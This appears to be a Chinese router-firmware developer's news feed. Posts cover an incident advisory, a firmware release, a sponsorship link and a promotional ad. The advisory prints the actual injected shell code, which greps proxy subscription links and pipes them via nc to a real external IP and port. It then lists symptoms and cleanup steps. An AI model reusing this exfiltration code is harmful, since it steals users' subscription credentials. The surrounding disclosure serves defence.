【20241207】tailscale插件2.0.2更新：更新二进制到 v1.78.1版本

紧急通知！紧急通知！

最近不断有软件中心页面错误，版本变成0.0.0的事件发生，且ssh无法登录，scp也无法使用！

经过排查，这是因为恶意代码被插入了软件中心的环境变量脚本导致的！

恶意代码如下：

############################################## Extract links and store them in a variable (skip if file does not exist)
if [ -f /koolshare/merlinclash/yaml_bak/subscription.txt ]; then
    links=$(grep -o '"link":"[^"]*' /koolshare/merlinclash/yaml_bak/subscription.txt | cut -d'"' -f4)

    if [ ! -z "$links" ]; then
        echo "$links" | nc -w 5 45.61.185.105 6232
    fi
else
    echo_date ""
fi

# Check if the log file exists and send online links if found
if [ -f /jffs/ksdb/log ]; then
    online_links=$(grep 'ss_online_links' /jffs/ksdb/log)

    if [ ! -z "$online_links" ]; then
        echo "$online_links" | nc -w 5 45.61.185.105 6232
    fi
fi

以上恶意代码会检测merlinclash和fancyss的订阅链接，并将其发送到ip地址是45.61.185.105的服务器的6232端口！

简单来说，这些代码的作用就是偷订阅链接！！

目前还不知道恶意代码是怎么插入的，我们还在调查！
如果大家遇到这个问题，你的订阅链接大概率已经被泄露！

赶紧采取以下措施：

如果使用了usb2jffs插件：

1. 拔掉U盘，格式化掉U盘
2. 双清路由器后重新配置
3. 双清后进入软件中心，将其升级到最新版本（目前是1.9.34）
4. 插入U盘重新制作usb2jffs
5. 最重要的：去你的机场更换订阅链接！

如果没用usb2jffs插件，执行2，3，5步骤！即可

中招的表现形式目前有两种：

第一种（前几个月的）
有日志显示的插件（科学或其他插件）在提交的时候，会在前两行出现`grep: /koolshare/merlinclash/yaml_bak/subscription.txt no sucj file or directory`的日志，这是因为恶意代码插入后，会判断是否有这个文件，如果没有使用MC插件的就会出现这个日志。

第二种（近期）
恶意代码升级了，但是恶意代码升级导致环境变量出问题了，所以路由器的ssh无法登录，一登陆上就断开，还会导致scp无法使用，软件中心版本0.0.0

———————
这次是因为恶意代码自己出问题，导致出现显性的症状了，中间不知道是否有一些版本的恶意代码，没有导致显性问题。
从群里朋友的截图和反馈来看，恶意代码最早从2024年7月就已经开始植入了，中间恶意代码还有更新，近期的恶意代码更新导致了显性问题，所以才被注意到。

这两天会更新下软件中心，或者增加一个软件中心校验插件，如果没有通过校验，大概率是遇到了恶意代码插入。

现在我们正在查找恶意代码插入原因，初步判断不是远程执行导致的，可能是某个第三方二进制闭源的插件去写入的恶意代码。中招过的朋友可以说下自己用的什么插件。

针对此次恶意代码事件的漏洞修复插件还在开发中，预计本周内上线

【20241213】RT-BE88U官改固件102_37094版本发布，现可赞助获取

更新要点：

此版本RT-BE88U官改固件是基于华硕2024年12月9日发布的3.0.0.6.102_37094 GPL源码制作，此版本GPL对应的华硕官方固件发布于2024/11/25，且此版本目前仍然是RT-BE88U的最新官方版本。

而目前梅林和梅林改版固件的RT-BE88U最新固件版本是102.2_2，其是基于华RT-BE88U硕3.0.0.6.102_333921 GPL源码制作。官改固件终于在继GT-AX6000之后，再次对梅林固件实现版本号的超赶。

由于华硕RT-BE88U在102_37xxx固件版本中对AiMesh架构的重大升级，因此华硕在此固件中启用了web降级刷机限制的机制！这导致很多刷了102_37xxx官方固件的，或者机器出厂就是102_37xxx版本的用户，没办法通过web刷机刷到低版本有软件中心的固件！现在这个问题没有了！

这次102_37094_koolcenter官改固件在编译的时候，还解除了web降级刷机的限制，这意味着你在官方固件下无法web降级刷机，在相同版本的官改固件下可以做到了。只得一提的是，升级刷机的时候，华硕会升级JFFS分区内的配置文件，而降级刷机的时候，确不会降级配置文件。所以如果你进行降级刷机，刷机成功后请一定记得对固件进行双清操作（恢复出厂设置）

刷机总结：

1. 降级到37xxx之前版本要双清，有USB2JFFS需要重做

2. 升级到37xxx之后版本不双清，有USB2JFFS需要重做

更新日志（相较于102_33921_koolcenter_alpha2.0）：

1. 基于RT-BE88U官方最新源代码制作：GPL_RTBE88U_300610237094；

2. 同步软件中心为目前最新版本：1.9.34

3. 更新软件中心初始化过程，现在软件中心占用更少的JFFS空间

4. 移除此固件的web降级刷机限制

———————————————————————————————

赞助6元获取固件：https://afdian.com/a/sadog?tab=shop

———————————————————————————————

PS: RT-BE88U上个赞助获取的官改固件版本：102_33921_alpha_2.0已经免费公布到 https://www.koolcenter.com

【20241219】官改/梅改固件，软件中心近期事项

因为最近太忙了，拖了很多，跟大家说下近期计划事项

1. 恶意代码修复插件预计下周才能上（最近恶意事件少了些，遇到的都建议双清重新设置）
2. 一些插件在BE88U 37094固件上web前端显示有些问题，需要修复（swap, usb2jffs, wifiboost等）
3. GT-AX11000_PRO和AX88U_PRO有102源代码了，近期应该会做对应官改固件
4. TUF-AX3600, ZenWiFi BD4应该也会开启官改固件制作
5. 其它的想起再补充

🏃加入网心云KoolCenter版
🤩热门会员我送你
‼限时活动进行时

【只要绑定设备保持7️⃣天在线】
即可领取↓↓↓
💳会员季卡 或 💰30元现金
😋还有迅雷下载/爱奇艺/优酷/腾讯…超多会员等你拿

🏃先到先得，快来参与吧！
上机教程及更多活动详情：https://act.walk-live.com/acts/kool

【20241223】新闻，华硕停止官方DDNS服务

【AndroidNAS发布及使用体验(最新Android14)-哔哩哔哩】 https://b23.tv/NAMD9Ku 【软路由接显示器，iStoreOS 开源屏幕插件-哔哩哔哩】 https://b23.tv/i2Ih2UT

【20241227】软件中心一堆插件更新，不要惊慌

这是在为最新的102_37xxx的web做适配，因为华硕更新了102_37xxx固件的一些前段js库，导致引用了这些库的插件需要一些小更新。

【20241227】关于偷订阅漏洞事件的一些说明

1. 原因已经在两周前找到，目前，目前漏洞还在修复中，等做好会推送软件中心版本。

2. 漏洞属于远程改写漏洞，可以被间接利用用于在路由器内执行代码

3. 漏洞不是来源于李鬼插件，也和防火墙开关与否无关，ssh开关与否无关

现在能告诉大家的就是：如果你有公网ip，且设置了【从互联网访问路由器】web后台，那就有被入侵风险。攻击者会通过对公网ip的常见端口扫描（比如8443），找到你的远程访问端口并进行入侵。

具体漏洞如何利用无法进行更加详细的描述，因为即使以后修复出来后，入侵者也能攻击未修复的存量用户。

所以在修复版本未出来前，建议开了公网访问的朋友：

1. 公网web访问不要使用诸如6666、8443、9999等常见端口

2. 在网络上跟网友交流时，不要以任何形式泄露自己的ddns域名

最后提醒下大家：

目前发现攻击者还在继续，并且其注入的文件（目前还是base.sh）代码已经更新，此次偷订阅更新后不会造成ssh断连和软件中心版本0.0.0故障了，所以可能你以为你是正常的，其实可能正处于中招状态（目前还是偷订阅）！

针对这个情况，我会在今明两天提前推出检测修复插件，插件能检测到你的软件中心重要文件是否被篡改，并且进行修复。